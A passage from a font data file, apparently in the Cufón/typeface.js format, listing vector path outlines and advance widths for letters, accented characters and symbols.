29},{"d":"26,-266v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm79,-266v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15","w":129},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100xm100,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":230},{"d":"235,-126v0,87,-42,132,-146,126r-59,0r0,-259r58,0v102,-4,147,44,147,133xm185,-127v0,-61,-36,-89,-106,-84r0,163v71,6,106,-16,106,-79","w":252},{"d":"197,0r-72,-190r-72,190r-53,0r100,-259r50,0r99,259r-52,0","w":249},{"d":"17,-129v0,-108,124,-174,213,-111r28,-33r22,18r-29,35v79,82,13,227,-99,227v-28,0,-52,-7,-74,-22r-31,35r-22,-19r30,-35v-21,-21,-38,-55,-38,-95xm198,-203v-56,-38,-131,7,-131,75v0,23,7,42,20,57xm109,-53v77,48,167,-52,110,-129","w":302},{"d":"101,-226v-20,1,-38,13,-37,34r-46,0v-1,-47,37,-78,85,-78v48,0,78,28,80,72v2,59,-67,59,-63,123r-47,0v-9,-53,37,-83,58,-110v14,-19,-5,-42,-30,-41xm67,-25v0,-16,14,-30,30,-30v18,0,31,14,31,30v1,15,-15,30,-30,30v-16,0,-31,-14,-31,-30","w":201},{"d":"85,70r-77,0r0,-45r29,0r0,-245r-29,0r0,-45r77,0r0,335","w":115},{"d":"19,-328r22,0r0,22r-22,0r0,-22xm63,-328r21,0r0,22r-21,0r0,-22xm106,-328r22,0r0,22r-22,0r0,-22xm150,-328r22,0r0,22r-22,0r0,-22xm194,-328r22,0r0,22r-22,0r0,-22xm238,-328r22,0r0,22r-22,0r0,-22xm-3,-284r22,0r0,22r-22,0r0,-22xm41,-284r22,0r0,22r-22,0r0,-22xm84,-284r22,0r0,22r-22,0r0,-22xm128,-284r22,0r0,22r-22,0r0,-22xm172,-284r22,0r0,22r-22,0r0,-22xm216,-284r22,0r0,22r-22,0r0,-22xm19,-240r22,0r0,22r-22,0r0,-22xm63,-240r21,0r0,22r-21,0r0,-22xm106,-240r22,0r0,22r-22,0r0,-22xm150,-240r22,0r0,22r-22,0r0,-22xm194,-240r22,0r0,22r-22,0r0,-22xm238,-240r22,0r0,22r-22,0r0,-22xm-3,-196r22,0r0,22r-22,0r0,-22xm41,-196r22,0r0,22r-22,0r0,-22xm84,-196r22,0r0,22r-22,0r0,-22xm128,-196r22,0r0,22r-22,0r0,-22xm172,-196r22,0r0,22r-22,0r0,-22xm216,-196r22,0r0,22r-22,0r0,-22xm19,-152r22,0r0,22r-22,0r0,-22xm63,-152r21,0r0,22r-21,0r0,-22xm106,-152r22,0r0,22r-22,0r0,-22xm150,-152r22,0r0,22r-22,0r0,-22xm194,-152r22,0r0,22r-22,0r0,-22xm238,-152r22,0r0,22r-22,0r0,-22xm-3,-109r22,0r0,22r-22,0r0,-22xm84,-109r22,0r0,22r-22,0r0,-22xm128,-109r22,0r0,22r-22,0r0,-22xm172,-109r22,0r0,22r-22,0r0,-22xm216,-109r22,0r0,22r-22,0r0,-22xm41,-109r22,0r0,22r-22,0r0,-22xm238,-65r22,0r0,22r-22,0r0,-22xm194,-65r22,0r0,22r-22,0r0,-22xm150,-65r22,0r0,22r-22,0r0,-22xm106,-65r22,0r0,22r-22,0r0,-22xm63,-65r21,0r0,22r-21,0r0,-22xm19,-65r22,0r0,22r-22,0r0,-22xm-3,-21r22,0r0,22r-22,0r0,-22xm41,-21r22,0r0,22r-22,0r0,-22xm84,-21r22,0r0,22r-22,0r0,-22xm128,-21r22,0r0,22r-22,0r0,-22xm172,-21r22,0r0,22r-22,0r0,-22xm216,-21r22,0r0,22r-22,0r0,-22xm238,23r22,0r0,22r-22,0r0,-22xm194,23r22,0r0,22r-22,0r0,-22xm150,23r22,0r0,22r-22,0r0,-22xm106,23r22,0r0,22r-22,0r0,-22xm63,23r21,0r0,22r-21,0r0,-22xm19,23r22,0r0,22r-22,0r0,-22xm-3,67r22,0r0,22r-22,0r0,-22xm41,67r22,0r0,22r-22,0r0,-22xm84,67r22,0r0,22r-22,0r0,-22xm128,67r22,0r0,22r-22,0r0,-22xm172,67r22,0r0,22r-22,0r0,-22xm216,67r22,0r0,22r-22,0r0,-22","w":256},{"d":"133,-267v78,0,135,56,135,134v0,78,-57,134,-135,134v-77,0,-134,-57,-134,-134v0,-77,57,-134,134,-134xm133,-27v60,0,105,-43,107,-105v2,-58,-49,-107,-106,-107v-58,0,-110,50,-108,106v2,61,46,106,107,106xm164,-59v-12,-24,8,-64,-28,-57r-26,0r0,57r-32,0r0,-147v52,2,120,-13,116,43v-1,19,-4,24,-17,33v25,5,6,62,24,71r-37,0xm163,-161v0,-24,-31,-15,-53,-17r0,35v23,-1,53,7,53,-18","w":266},{"d":"119,-265r49,0r0,166r23,0r0,46r-23,0r0,53r-48,0r0,-53r-113,0r0,-46xm120,-99r0,-86r-59,86r59,0","w":201},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm160,-347r57,0r-65,69r-34,0","w":302},{"d":"20,-189r176,0r0,44r-176,0r0,-44xm20,-114r176,0r0,44r-176,0r0,-44"},{"d":"335,-259r0,148r-31,0r0,-121r-48,121r-16,0r-47,-121r0,121r-31,0r0,-148r47,0r39,95r40,-95r47,0xm142,-259r0,26r-46,0r0,122r-32,0r0,-122r-46,0r0,-26r124,0","w":360},{"d":"79,-99v-6,72,35,79,78,43r0,43v-55,37,-122,14,-126,-61v-6,3,-13,6,-20,9r-7,-45r26,-13v-2,-86,10,-131,75,-139v35,-4,61,28,58,61v-4,56,-35,68,-84,102xm104,-222v-25,0,-23,37,-25,71v23,-19,42,-25,42,-52v0,-11,-6,-19,-17,-19","w":173},{"d":"29,-259r47,0r111,171r0,-171r50,0r0,259r-48,0r-110,-170r0,170r-50,0r0,-259xm324,-177v33,0,62,28,62,61v0,33,-29,62,-62,62v-33,0,-61,-29,-61,-62v0,-33,28,-61,61,-61xm324,-86v15,0,30,-15,30,-30v0,-15,-14,-29,-30,-29v-16,0,-30,14,-30,29v0,16,14,30,30,30xm263,-31r123,0r0,31r-123,0r0,-31","w":399},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm42,-347r42,69r-34,0r-65,-69r57,0","w":100},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259xm117,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":158},{"d":"78,-42v16,0,16,-13,16,-36r0,-181r49,0r0,172v16,104,-91,118,-136,56r35,-33v12,13,18,22,36,22","w":172},{"d":"24,-265r218,0r0,29r-174,0r107,136r-114,142r183,0r0,28r-223,0r0,-33r109,-136r-106,-135r0,-31","w":256},{"d":"221,-133v0,80,-30,138,-104,138v-72,0,-102,-59,-102,-137v0,-76,32,-138,103,-138v73,0,103,58,103,137xm64,-155r107,0v-4,-47,-22,-70,-54,-70v-31,0,-48,23,-53,70xm171,-110r-107,0v5,47,22,70,53,70v31,0,49,-23,54,-70","w":235},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"102,-265v70,0,96,75,62,141r-67,131r-42,-21r46,-88v-44,1,-79,-38,-79,-82v0,-44,37,-81,80,-81xm70,-184v0,19,13,35,33,35v19,0,33,-17,33,-35v1,-18,-15,-35,-33,-35v-18,0,-33,17,-33,35","w":201},{"d":"29,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259xm50,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":244},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm40,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm118,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":208},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm91,-347r42,69r-34,0r-65,-69r57,0","w":187},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm189,-297v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":230},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm75,-303v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":187},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115"},{"d":"29,-258r159,0r0,40r-106,0r0,218r-53,0r0,-258","w":193},{"d":"30,-262r48,0r0,71r28,0r0,41r-28,0r0,150r-48,0r0,-150r-25,0r0,-41r25,0r0,-71","w":107},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm79,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":302},{"d":"187,-184v-1,38,-20,58,-50,69r62,115r-54,0r-58,-110r-5,0r0,110r-49,0r0,-259v83,-3,155,-1,154,75xm139,-184v-1,-27,-25,-27,-57,-26r0,52v30,0,58,2,57,-26","w":208},{"d":"183,-129v0,57,-35,77,-104,74r0,55r-50,0r0,-259r50,0r0,55v71,-2,104,17,104,75xm135,-129v0,-27,-26,-28,-56,-27r0,53v30,1,56,2,56,-26","w":201},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm43,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":230},{"d":"86,72v12,-2,9,-10,9,-31r0,-346r26,0r0,318v1,41,-18,75,-52,78v-25,2,-33,-33,-9,-36v13,-1,17,15,26,17"},{"d":"183,-168v0,45,-36,81,-79,83r0,65r73,0r0,9r-73,0r0,70r-10,0r0,-70r-73,0r0,-9r73,0r0,-65v-42,-2,-78,-37,-78,-83v0,-45,38,-84,83,-84v45,0,84,39,84,84xm99,-93v40,0,75,-35,75,-75v0,-40,-35,-75,-75,-75v-40,0,-75,35,-75,75v0,40,35,75,75,75","w":198},{"d":"99,7v-68,0,-107,-85,-61,-142r66,-130r42,21r-45,88v45,-2,79,38,79,82v0,43,-38,81,-81,81xm132,-75v0,-19,-14,-35,-34,-35v-18,0,-32,16,-32,35v0,18,15,35,32,35v18,0,35,-16,34,-35","w":201},{"d":"19,-265r48,0r0,265r-48,0r0,-265","w":86},{"d":"67,-265v55,9,125,21,170,-5r36,0r-205,288r-35,0r175,-247v-27,5,-52,6,-81,4v16,43,-17,83,-58,83v-34,0,-63,-28,-62,-61v0,-36,27,-59,60,-62xm99,-203v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,14,29,30,29v16,0,30,-14,30,-29xm330,-55v0,-33,29,-62,62,-62v32,0,62,30,62,62v0,33,-29,62,-62,62v-33,0,-62,-29,-62,-62xm422,-55v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,15,30,30,30v15,0,30,-15,30,-30xm179,-55v0,-33,29,-62,61,-62v33,0,62,29,62,62v0,33,-29,62,-62,62v-33,0,-61,-29,-61,-62xm270,-55v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,15,30,30,30v15,0,30,-15,30,-30","w":460},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm65,-226r0,-39r101,0r0,39r-101,0","w":230},{"d":"260,-125r0,31r-116,0r0,203r-31,0r0,-234r147,0","w":256},{"d":"115,-213v-4,-22,-41,-22,-46,-1v-2,4,-2,12,-2,23r28,0r0,40r-28,0r0,151r-49,0r0,-151r-17,0r0,-40r17,0v-12,-81,93,-101,135,-53v6,8,10,18,12,31r-50,0xm117,-191r48,0r0,191r-48,0r0,-191","w":187},{"d":"4,-191r49,0r48,113r48,-113r49,0r-82,191r-31,0","w":201},{"d":"86,-151r0,-66r44,0r0,66r66,0r0,44r-66,0r0,66r-44,0r0,-66r-66,0r0,-44r66,0"},{"d":"195,-119r0,35r-40,0r-13,84r-35,0r12,-84r-34,0r-12,84r-35,0r12,-84r-39,0r0,-35r45,0r5,-33r-39,0r0,-35r44,0r11,-78r35,0r-11,78r33,0r12,-78r35,0r-11,78r35,0r0,35r-40,0r-5,33r35,0xm129,-152r-34,0r-4,33r33,0"},{"d":"273,-154v28,31,52,51,73,59r0,7v-22,10,-47,30,-73,60r-13,0v11,-24,22,-42,34,-54r-280,0r0,-18r280,0v-13,-16,-25,-34,-34,-54r13,0","w":360},{"d":"-2,-82r0,-43r364,0r0,43r-364,0","w":360},{"d":"27,-265r45,0v2,45,-4,73,-25,99r-18,-14v9,-12,12,-18,16,-35r-18,0r0,-50","w":100},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm-14,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm64,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":100},{"d":"172,-110v68,-1,48,-83,51,-149r50,0r0,90v0,61,-34,96,-101,104r0,65r-49,0r0,-65v-67,-8,-100,-43,-100,-106r0,-88r49,0v4,63,-19,147,51,148r0,-148r49,0r0,149","w":295},{"d":"64,-192v-26,4,-11,60,-15,91r-35,0r0,-120r35,0r0,10v25,-27,62,-7,62,32r0,78r-35,0v-3,-31,9,-85,-12,-91","w":123},{"d":"109,5v-64,-2,-91,-33,-90,-102r0,-94r48,0v5,58,-21,151,42,151v30,0,45,-17,45,-52v0,-28,-16,-50,-48,-65r26,-40v46,25,69,60,69,105v0,56,-34,98,-92,97"},{"d":"86,-257r8,0v9,21,29,45,59,71r0,14v-20,-8,-39,-19,-55,-34r0,230v16,-15,35,-26,55,-34r0,14v-30,26,-50,50,-59,71r-8,0v-9,-21,-29,-45,-59,-71r0,-14v20,8,38,19,54,34r0,-230v-16,15,-34,26,-54,34r0,-14v30,-26,50,-50,59,-71","w":180},{"d":"222,-95v7,79,-97,133,-150,75r0,20r-48,0r0,-265r48,0r0,95v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"100,-50r44,0v2,45,-4,73,-25,98r-17,-13v8,-12,12,-18,15,-35r-17,0r0,-50xm28,-50r44,0v2,45,-3,74,-25,98r-17,-13v8,-12,12,-19,16,-35r-18,0r0,-50","w":172},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm141,-347r57,0r-65,69r-34,0","w":266},{"d":"113,109r0,-437r31,0r0,203r116,0r0,31r-116,0r0,203r-31,0","w":256},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm62,-266v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm115,-266v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15"},{"d":"208,-85v0,74,-86,118,-137,70r0,85r-48,0r0,-258v-1,-49,30,-82,79,-82v66,0,104,77,47,113v39,12,59,35,59,72xm115,-39v25,0,45,-16,45,-40v0,-31,-23,-47,-67,-47r0,-40v24,-4,36,-15,36,-34v0,-15,-10,-26,-25,-26v-50,0,-30,91,-33,141v-2,28,17,46,44,46","w":222},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm127,-295r57,0r-65,69r-34,0","w":237},{"d":"59,-119v-19,1,-25,9,-41,20r0,-56v68,-47,120,53,181,-5r0,57v-48,32,-93,-7,-140,-16"},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm80,-266v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm133,-266v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15","w":237},{"d":"134,-270v17,0,31,15,31,31v0,16,-14,31,-31,31v-16,0,-31,-14,-31,-31v0,-17,15,-31,31,-31xm43,-270v17,0,31,14,31,31v0,17,-15,31,-31,31v-16,0,-31,-15,-31,-31v0,-15,15,-32,31,-31xm19,-191r49,0r0,191r-49,0r0,-191xm72,30v19,10,38,7,38,-20r0,-201r48,0r0,197v4,63,-35,80,-86,62r0,-38","w":180},{"d":"72,0r-48,0r0,-191r168,0r0,191r-48,0r0,-145r-72,0r0,145"},{"d":"117,-188v9,-43,-34,-55,-47,-26v-2,5,-3,12,-3,23r28,0r0,40r-28,0r0,151r-48,0r0,-151r-18,0r0,-40r18,0v-1,-53,23,-79,73,-79v51,0,75,23,74,79r0,191r-49,0r0,-188","w":187},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152"},{"d":"79,109r0,-203r-82,0r0,-31r180,0r0,234r-31,0r0,-203r-36,0r0,203r-31,0","w":256},{"d":"95,-82v-15,46,-81,43,-84,-5v0,-18,11,-36,33,-54v31,-25,48,-50,52,-75v5,54,79,73,85,128v2,21,-18,41,-38,40v-18,0,-33,-12,-45,-34v-1,51,22,72,67,75r1,7r-140,0r2,-7v44,0,69,-29,67,-75","w":191},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm182,-245v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17"},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0xm152,-295r57,0r-65,69r-34,0","w":287},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84","w":208},{"d":"-2,-296r184,0r0,18r-184,0r0,-18","w":180},{"d":"86,-257r8,0v9,21,29,45,59,71r0,14v-20,-8,-39,-19,-55,-34r0,230v16,-15,35,-26,55,-34r0,14v-30,26,-50,50,-59,71r-8,0v-9,-21,-29,-45,-59,-71r0,-14v20,8,38,19,54,34r0,-230v-16,15,-34,26,-54,34r0,-14v30,-26,50,-50,59,-71xm27,92r126,0r0,17r-126,0r0,-17","w":180},{"d":"79,109r0,-437r31,0r0,437r-31,0","w":223},{"d":"94,-265r28,0r0,335r-28,0r0,-335"},{"d":"30,-265r77,0r0,45r-29,0r0,245r29,0r0,45r-77,0r0,-335","w":115},{"d":"10,-127v0,-83,22,-138,90,-138v72,0,92,56,92,136v0,80,-19,136,-91,136v-71,0,-91,-53,-91,-134xm101,-39v55,5,48,-125,30,-160v-7,-14,-18,-19,-30,-19v-40,0,-42,42,-42,92v0,52,7,84,42,87","w":201},{"d":"25,-265r48,0r0,153r70,-79r60,0r-82,92r92,99r-59,0r-81,-88r0,88r-48,0r0,-265","w":208},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49","w":180},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84","w":208},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259","w":187},{"d":"164,-192v0,36,-16,39,-42,68v21,25,35,40,41,46v4,-3,14,-11,29,-24r29,34r-27,24r42,44r-60,0r-17,-18v-54,39,-142,34,-142,-38v0,-38,19,-54,46,-76v-44,-47,-26,-113,38,-116v35,-2,63,26,63,56xm102,-203v-22,3,-19,27,-4,44v13,-11,20,-20,20,-29v0,-8,-7,-16,-16,-15xm63,-58v7,28,39,23,64,6v-9,-9,-22,-23,-38,-44v-17,14,-26,27,-26,38","w":244},{"d":"77,7r110,-272r30,0r-110,272r-30,0xm36,-262r47,0r0,133r-33,0r0,-105r-34,0xm240,-136v38,0,66,39,34,64v41,23,17,81,-33,75v-50,6,-77,-51,-35,-75v-31,-24,-5,-64,34,-64xm240,-83v9,0,16,-6,16,-14v0,-8,-5,-12,-16,-12v-8,1,-15,4,-15,12v0,8,6,14,15,14xm218,-40v0,10,10,16,22,16v15,0,22,-6,22,-16v0,-11,-10,-17,-21,-17v-10,0,-23,6,-23,17","w":302},{"d":"25,-265r48,0r0,153r70,-79r60,0r-82,92r92,99r-59,0r-81,-88r0,88r-48,0r0,-265xm142,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":208},{"d":"143,-22v-12,35,-67,34,-79,1r0,91r-49,0r0,-261r49,0v5,60,-21,155,40,155v60,0,33,-97,39,-155r49,0r0,191r-49,0r0,-22","w":207},{"d":"80,109r0,-437r30,0r0,437r-30,0xm146,-127r0,-201r31,0r0,170r83,0r0,31r-114,0xm146,109r0,-200r114,0r0,31r-83,0r0,169r-31,0","w":256},{"d":"30,-259r129,0r0,48r-80,0r0,47r80,0r0,48r-80,0r0,116r-49,0r0,-259","w":172},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm179,-42v17,0,16,-15,16,-36r0,-181r49,0r0,172v16,102,-91,119,-137,56r36,-33v13,15,25,22,36,22","w":273},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm-21,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm57,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":86},{"d":"53,0r125,-249r125,249r-250,0","w":356},{"d":"41,1v0,-46,0,-66,-39,-70r0,-42v35,-2,39,-22,39,-62v0,-70,17,-87,82,-86r0,43v-27,1,-37,-1,-36,25v0,44,-1,86,-33,102v31,22,31,35,32,96v0,30,8,28,37,30r0,42v-62,2,-82,-13,-82,-78","w":122},{"d":"101,-139r38,0r0,28r-38,0r0,111r-50,0r0,-111r-39,0r0,-28r39,0r0,-71r-47,0r0,-49r143,0r0,49r-46,0r0,71","w":151},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0","w":230},{"d":"4,-259r143,0r0,49r-47,0r0,210r-50,0r0,-210r-46,0r0,-49xm4,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":151},{"d":"79,-227r87,0r0,-32r49,0r0,32r24,0r0,29r-24,0r0,198r-49,0r0,-113r-87,0r0,113r-50,0r0,-198r-23,0r0,-29r23,0r0,-32r50,0r0,32xm79,-198r0,37r87,0r0,-37r-87,0","w":244},{"d":"222,-95v7,79,-97,133,-150,75r0,90r-48,0r0,-335r48,0r0,95v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"113,109r0,-267r147,0r0,31r-116,0r0,36r116,0r0,31r-116,0r0,169r-31,0","w":256},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm49,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm127,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":223},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm36,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0"},{"d":"109,5v-64,-2,-91,-33,-90,-102r0,-94r48,0v5,58,-21,151,42,151v30,0,45,-17,45,-52v0,-28,-16,-50,-48,-65r26,-40v46,25,69,60,69,105v0,56,-34,98,-92,97xm133,-288r-7,67r-35,0r-7,-67r49,0xm56,-266v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22xm161,-266v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22"},{"d":"189,-203v60,0,112,51,112,112v0,61,-52,112,-112,112v-60,0,-112,-52,-112,-112v0,-60,52,-112,112,-112xm146,-100v8,0,15,-6,15,-14v0,-8,-7,-14,-15,-14v-7,0,-14,7,-14,14v0,7,7,14,14,14xm232,-100v8,0,15,-7,15,-14v0,-7,-7,-14,-15,-14v-7,-1,-14,7,-14,14v0,7,7,15,14,14xm138,-55v21,46,81,45,103,0r-11,-6v-16,33,-66,34,-81,0","w":378},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138xm119,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":302},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm124,-295r57,0r-65,69r-34,0","w":230},{"d":"15,-96v0,-58,57,-116,117,-95v-3,-8,-9,-17,-18,-28r-46,14r-9,-28r33,-10v-11,-10,-19,-18,-24,-22v23,0,50,-4,60,10r35,-10r9,28r-18,5v33,32,61,75,63,130v1,59,-44,107,-102,107v-55,0,-100,-47,-100,-101xm168,-95v0,-32,-23,-56,-53,-56v-30,-1,-52,24,-52,55v0,32,21,56,52,56v31,1,53,-24,53,-55","w":230},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259","w":266},{"d":"50,-196v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28v0,-15,12,-27,27,-27","w":100},{"d":"104,-160r0,82r-81,0r0,-82r81,0xm91,-146r-55,0r0,54r55,0r0,-54","w":127},{"d":"12,-239v-1,-16,15,-31,31,-31v16,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-30,-15,-31,-31xm19,-191r48,0r0,191r-48,0r0,-191xm10,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":86},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm43,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":230},{"d":"222,-95v7,79,-97,133,-150,75r0,90r-48,0r0,-261r48,0r0,21v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm96,-295r42,69r-34,0r-65,-69r57,0","w":208},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80xm21,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":187},{"d":"175,-73v0,64,-71,98,-129,71v-13,-6,-27,-19,-42,-38r38,-27v20,37,82,38,84,-9v